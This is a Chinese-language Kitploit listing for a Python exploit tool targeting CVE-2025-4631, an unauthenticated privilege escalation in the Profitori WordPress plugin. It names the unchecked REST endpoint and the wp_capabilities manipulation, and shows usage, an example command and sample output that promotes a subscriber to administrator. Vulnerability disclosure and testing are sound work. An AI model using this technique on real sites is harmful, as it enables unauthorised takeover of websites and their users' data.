Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - 缺少授权导致未认证权限提升 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-4631
权限提升漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - 缺少授权导致未认证权限提升

查看仓库
1111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2025-4631 - Profitori WordPress 插件权限提升漏洞利用工具

📌 漏洞摘要

Profitori 插件(版本 2.0.6.0 至 2.1.1.3) 存在 未授权权限提升 漏洞,原因是 /wp-json/stocktend/v1/stocktend_object 端点缺少权限检查。攻击者可通过直接操纵 wp_capabilities 元字段,提升现有用户权限(或创建新用户)。

  • CVE: CVE-2025-4631
  • CVSS 评分: 9.8(严重)
  • 发布日期: 2025年5月30日
  • 最后更新: 2025年5月31日

🛠️ 脚本功能

该 Python 漏洞利用工具自动执行权限提升过程:

  1. ✅ 通过 readme.txt 文件检查插件版本。
  2. 🚀 如果检测到易受攻击的版本,则利用有漏洞的 REST API 端点。
  3. 📡 发送有效载荷以将用户权限提升至管理员。
  4. 🧾 打印格式化、详细的结果,包括修改后的用户凭据。

如果版本检查失败,该利用工具会谨慎进行,并发出警告。


📸 漏洞利用证明

概念验证


💻 使用方法

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

示例:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

示例输出:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ 脚本参数


📂 依赖要求

  • Python 3.x
  • requests 库

通过以下命令安装:

root@kitploit:~
pip install requests

⚠️ 免责声明

此工具仅供 教育和授权测试目的 使用。针对非您拥有或未经明确许可的系统滥用此漏洞利用工具是 严格禁止的。创建者对因不当使用造成的任何损害或法律后果概不负责。


作者: Nxploited ( Khaled_Alenazi )

下载工具
标志描述必需
-u, --url🌐 WordPress 站点的基础 URL✅ 是
-id🆔 要提升权限的用户 ID✅ 是
--email📧 显示的虚假电子邮件❌ 否
--name👤 显示名称❌ 否
--url_field🔗 用户 URL 字段❌ 否
--verbose🔍 打印完整 JSON 响应❌ 否